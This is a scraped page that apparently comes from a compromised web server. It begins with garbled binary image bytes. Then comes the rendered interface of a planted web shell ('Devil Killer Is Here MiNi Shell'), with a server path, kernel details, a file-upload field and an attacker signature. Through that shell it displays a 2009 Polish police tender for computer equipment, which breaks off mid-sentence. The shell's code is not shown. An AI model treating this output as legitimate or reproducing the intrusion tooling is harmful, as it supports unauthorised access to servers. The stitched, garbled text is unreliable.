JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/61303-N-2009.html

<p class="kh_header"><b>Gorzów Wielkopolski: Zakup i dostawa sprzętu informatycznego</b><br>
<b>Numer ogłoszenia: 61303 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7211420, faks 095 7211455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.policja.gorzow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa sprzętu informatycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje zakup i dostawę:
a) Laptop - 46 szt.
b) Zestaw PC - 5 szt.
c) Drukarka sieciowa - 20 szt.
Wykaz wymaganego sprzętu informatycznego - sporządzony w formie tabeli do wypełnienia przez Wykonawcę w kwestii oferowanych parametrów technicznych stanowi zał. nr 8 do SIWZ.
Specyfikacja wraz z załącznikami określa minimalne wymagania techniczne.
Wykonawca musi zapewnić minimum 24 m-czny okres gwarancji dla urządzeń stanowiących przedmiot zamówienia - z wyjątkiem:
- dla zestawu PC wymagany okres gwarancji 3 lata, tj. 36 m-cy on-site;
- dla monitora LCD, wchodzącego w skład zestawu PC, wymagany okres gwarancji 36 m-cy.
Okres gwarancji liczony jest od momentu podpisania protokołu odbioru dostawy.
Wymagania dotyczące serwisu i gwarancji oraz realizacji dostaw i zasady płatności zawiera zał. nr 7 do SIWZ, tj. Projekt Umowy. 
Termin zapłaty za fakturę - 30 dni kalendarzowych od daty dostarczenia faktury Vat  do siedziby Zamawiającego.
Zamawiający dopuszcza zaoferowanie towaru równoważnego - przy czym jego wydajność, jakość oraz parametry techniczne nie mogą być mniejsze niż określone przez Zamawiającego w SIWZ. 
Wykazanie równoważności przedmiotu zamówienia (zgodnie z art. 30 ust. 5 ustawy P.z.p.) spoczywa na Wykonawcy.
W przypadku wyspecyfikowanych systemów operacyjnych, pakietów oprogramowania biurowego, systemów antywirusowych nie dopuszcza się oferowania rozwiązań równoważnych ze względu na ujednolicenie platformy systemów operacyjnych, oprogramowania biurowego  i pakietu antywirusowego zastosowanych w jednostkach terenowych Policji województwa lubuskiego. Wyspecyfikowane oprogramowanie współpracuje z funkcjonującym w całej Polsce (w tym woj. lubuskim) Krajowym Systemem Informacji Policji. Wprowadzenie zamienników może spowodować błędne działanie wyżej wymienionego systemu. W związku ze strukturą posiadanych systemów informatycznych, w której aplikacje użytkownika końcowego pracują w oparciu o aplikacje Microsoft oferowany przez wykonawców system operacyjny i oprogramowanie biurowe musi zagwarantować użytkownikowi końcowemu bezawaryjną obsługę aplikacji poprzez unifikacje i kompatybilność proponowanych rozwiązań. Oprogramowanie, o którym mowa powyżej jest powszechnie dostępne u różnych dostawców przez co wskazanie  konkretnego oprogramowania nie narusza zasad równego traktowania Wykonawców oraz zasad uczciwej konkurencji. 
Wykonawca dostarczy przedmiot zamówienia fabrycznie nowy.
Oferowany asortyment musi być kompletny i po zainstalowaniu gotowy do pracy, bez żadnych dodatkowych zakupów i inwestycji /poza typowymi znormalizowanymi materiałami eksploatacyjnymi/.
Miejsce dostawy: Komenda Wojewódzka Policji w Gorzowie Wlkp., ul. Kwiatowa 10, 66-400 Gorzów Wlkp..
Dostarczony asortyment musi posiadać Znak CE (o ile dotyczy) zgodnie z obowiązującymi w tym zakresie dyrektywami UE..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.23.62.00-4, 30.21.33.00-8, 30.23.21.10-8, 48.00.00.00-8, 33.19.51.00-4, 30.21.31.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
Wykonawca musi wykazać się należytym zrealizowaniem dostaw w okresie ostatnich 3 lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, min. 1  (jednorazową lub wynikająca z jednej umowy) dostawą odpowiadającą rodzajem dostawom stanowiącym przedmiot zamówienia i wartością  min. 100.000,00 zł brutto.  
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia na zasadach określonych w SIWZ i warunkach umowy, o wartości minimum 200.000,00 zł brutto. 
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 
2) Z postępowania o udzielenie zamówienia wyklucza się Wykonawców zgodnie z wymaganiami art. 24 ust. 1 i 2 ustawy P.z.p..
3) Ocena spełnienia warunków udziału w postępowaniu będzie odbywała się na podstawie złożonych przez Wykonawcę dokumentów potwierdzających spełnianie postawionych warunków (spełnia/ nie spełnia) - zgodnie z drukiem ZP-17 Informacja o spełnianiu przez wykonawców warunków udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego - wzór zgodnie z Rozporządzeniem Prezesa rady Ministrów z dnia 16 października 2008r. W sprawie protokołu postępowania o udzielenie zamówienia publicznego (Dz.U. z 2008r. nr 188 poz. 1154). Wszystkie dokumenty jakie Zamawiający wymaga na potwierdzenie spełniania warunków udziału w postępowaniu są wymienione w pkt XIII SIWZ.
4) Przedsiębiorców prowadzących działalność gospodarczą w formie spółki cywilnej należy traktować jako Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wyrok ZA UZP/ZO/0-1089/05).
5) W przypadku Wykonawców występujących wspólnie (Konsorcjum/Spółka Cywilna) warunki wymienione w pkt XIII ppkt 1) lit. a) i d) muszą być spełnione przez każdego z członków Konsorcjum/przedsiębiorców prowadzących działalność w formie Spółki Cywilnej osobno natomiast warunki wymienione w pkt XIII ppkt 1) lit. b), c) członkowie Konsorcjum/ przedsiębiorców prowadzących działalność w formie Spółki Cywilnej mogą spełniać wspólnie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Na potwierdzenie spełnienia warunków udziału w postępowaniu Wykonawca zobowiązany jest złożyć:
a) oświadczenie, że Wykonawca spełnia warunki art. 22 ust. 1 ustawy P.z.p. i nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy P.z.p. (wzór - zał. nr 1 do SIWZ). W
b) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do rejestru działalności gospodarczej, potwierdzające, że przedmiot działania wykonawcy, obejmuje zakres niezbędny do wykonania zamówienia. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, warunek aktualności będzie również spełniał dokument wystawiony z datą wcześniejszą, lecz posiadający zapis o aktualności danych dokonany przez organ wydający w wymaganym przez Zamawiającego terminie. 
c) wykaz wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli  okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu dat wykonania i odbiorców oraz załączeniem dokumentów (np. listów referencyjnych)  potwierdzających należyte wykonanie tych dostaw (wzór - zał. nr 2 do SIWZ); Z dokumentów musi wynikać że Wykonawca spełnia warunek postawiony przez Zamawiającego w  pkt XIII ppkt 1 lit. b) SIWZ). 
d) oświadczenie o posiadaniu środków finansowych lub zdolności kredytowej umożliwiającej realizacje przedmiotu zamówienia. Z dokumentów musi wynikać, że Wykonawca spełnia warunek postawiony przez Zamawiającego w  pkt XIII ppkt 1 lit. c) SIWZ. (wzór - zał. nr 3 do SIWZ ). 
2. Wykonawcy zagraniczni: Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. XIV ppkt. 1 lit b), składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokumenty o których mowa (Wykonawcy zagraniczni) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej (Wykonawcy zagraniczni), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubuska.policja.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Wojewódzka Policji, ul. Kwiatowa 10, 66-400 Gorzów Wlkp..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2009 godzina 11:00, miejsce: Komenda Wojewódzka Policji, ul. Kwiatowa 10, 66-400 Gorzów Wlkp..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. OTWARCIE OFERT NASTĄPI W DNIU 20.04.2009r., o godz. 11:15 W SIEDZIBIE ZAMAWIAJĄCEGO.
2. Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy P.z.p.) w języku polskim (art. 9 ust. 2 ustawy P.z.p.). 
3. Wszelkie zapytania dotyczące postępowania o udzielenie zamówienia należy kierować  do Sekcji ds. Zamówień Publicznych fax 095 7211435 e-mail: kwp_gorzow.zamowienia@lubuska.policja.gov.pl lub na adres: Komenda Wojewódzka Policji Sekcja ds. Zamówień Publicznych, ul. Kwiatowa 10; 66-400 Gorzów Wlkp..
4. Na potwierdzenie spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego w SIWZ wykonawca musi załączyć do oferty:
a) Oświadczenie Wykonawcy - w formie tabeli do wypełnienia przez Wykonawcę, w kwestii oferowanych parametrów technicznych - zgodnie ze wzorem który stanowi zał. nr 8 do SIWZ  Wykaz wymaganego sprzętu informatycznego;
b) Oświadczenie producenta o min. 2 letnim okresie gwarancji, o którym mowa w Tabeli 1 Lp. 16 załącznika nr 8 do SIWZ,  
c) Certyfikat jakości ISO 9001 i 14001 na projektowanie, produkcje i sprzedaż, o którym mowa w Tabeli 1 Lp. 20 zał. nr 8 do SIWZ; 
d) Wydruk z internetowego katalogu firmy Microsoft potwierdzający zgodność z systemem operacyjnym MS Vista Business x86 lub Windows XP Professional x86, o którym mowa w Tabeli 1 Lp. 20 zał. nr 8 do SIWZ; 
e) Oświadczenie producenta o 3 letnim okresie gwarancji on-site z maksymalnym czasem reakcji serwisu - drugi dzień roboczy, o którym mowa w Tabeli 2 Lp. 18 zał. nr 8 do SIWZ;  
f) Wydruk z internetowego katalogu firmy Microsoft. Zgodność z DMI 2.0 (Desktop Management Interface), WMI 1.5 (Windows Management Instrumentation) potwierdzający kompatybilności z systemem operacyjnym MS VISTA lub MS WIN XP PRO, o którym mowa w Tabeli 2 Lp 19 zał. nr 8 do SIWZ;  
g) Deklaracja zgodności CE, oraz zgodność z normą Ergonomii ISO 9241,  o którym mowa w Tabeli 2 Lp 19 zał. nr 8 do SIWZ;  
h) Certyfikaty jakości ISO 9001 i 14001, o którym mowa w Tabeli 2 Lp 19 zał. nr 8 do SIWZ;  
i) Potwierdzenie zgodności z normą energooszczędności Energy Star 4.0  i obecności na liście:  http:www.energystar.gov_ia_products_prod_lists_computers_prod_list.xls, lub załączenie świadectwa potwierdzającego przeprowadzenie badań efektywności energetycznej i spełnienie przez wyrób wymogów specyfikacji technicznej ENERGY STAR w wersji, co najmniej 4.0., o których mowa w Tabeli 2 Lp 19 zał. nr 8 do SIWZ;  
j) Raport badawczy wykonany przez notyfikowane laboratorium potwierdzając, że poziom emitowanego hałasu, mierzony wg normy ISO 7779 i wykazany według normy ISO 9296 w trybie jałowym (IDLE) powinien wynosić nie więcej niż 22dB, o którym mowa w Tabeli 2 Lp 19 zał. nr 8 do SIWZ;  
k) Oświadczenie producenta sprzętu o dostępności oryginalnych części zamiennych przez okres min. 2 lat, o którym mowa w o którym mowa w Tabeli 2 Lp 22 zał. nr 8 do SIWZ;  
l) Deklaracja zgodności CE i Certyfikat jakości ISO 9001 dla Monitora LCD, o których mowa Tabeli 2 Lp 48 zał. nr 8 do SIWZ.    
5. Oferta Wykonawcy musi ponadto zawierać:
a) Formularz Ofertowy - zał. nr 4 do SIWZ; 
b) przypadku, gdy Wykonawcę reprezentuje pełnomocnik, pełnomocnictwo lub upoważnienie określające zakres czynności, do których jest umocowany - zał. nr 5 do SIWZ;
c) oświadczenie o podwykonawcach - zał. nr 6 do  SIWZ;
d) podpisany lub zaparafowany przez Wykonawcę Projekt Umowy - zał. nr 7 do  SIWZ;
e) w przypadku złożenia oferty przez spółkę cywilną należy załączyć oświadczenie o woli współpracy Wykonawców  wspólnie składających ofertę;
f) oświadczenie o woli współpracy Wykonawców  wspólnie składających ofertę.
Szczegółowy opis dokumentów, które Wykonawca musi załączyć do oferty zawiera pkt  XIV SIWZ, która jest dostępna na stronie internetowej www.lubuska.policja.gov.pl od momentu publikacji ogłoszenia w Biuletynie Zamówień Publicznych. Wzory formularzy stanowią załączniki do SIWZ - dostępne na stronie internetowej www.lubuska.policja.gov.pl od momentu publikacji ogłoszenia w Biuletynie Zamówień Publicznych. 
6. Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę informacji (dokumentów, załączników, oświadczeń itp.) mających wpływ na wynik prowadzonego postępowania powoduje wykluczenie Wykonawcy z przetargu na każdym jego etapie, zgodnie z dyspozycją art. 24 ust. 2 pkt. 2 ustawy P.z.p.. Osoba lub osoby składające ofertę ponoszą pełną odpowiedzialność za treść złożonego oświadczenia woli na zasadach określonych w art. 297 §1 Kodeksu Karnego.
7. Nie dotyczy finansowania projektu/programu ze środków Unii Europejskiej.
8. Zamawiający nie zamierza zawrzeć umowy ramowej.
9. Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.
10. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, warunki zmiany:
- omyłka pisarska, - omyłka rachunkowa, - zmiana Podwykonawcy oraz zakresu realizacji zamówienia przez Podwykonawcę,  - zmiana miejsca dostawy na wniosek Zamawiającego, - zmiana wynagrodzenia w przypadku urzędowej

Creat By MiNi SheLL
Email: jattceo@gmail.com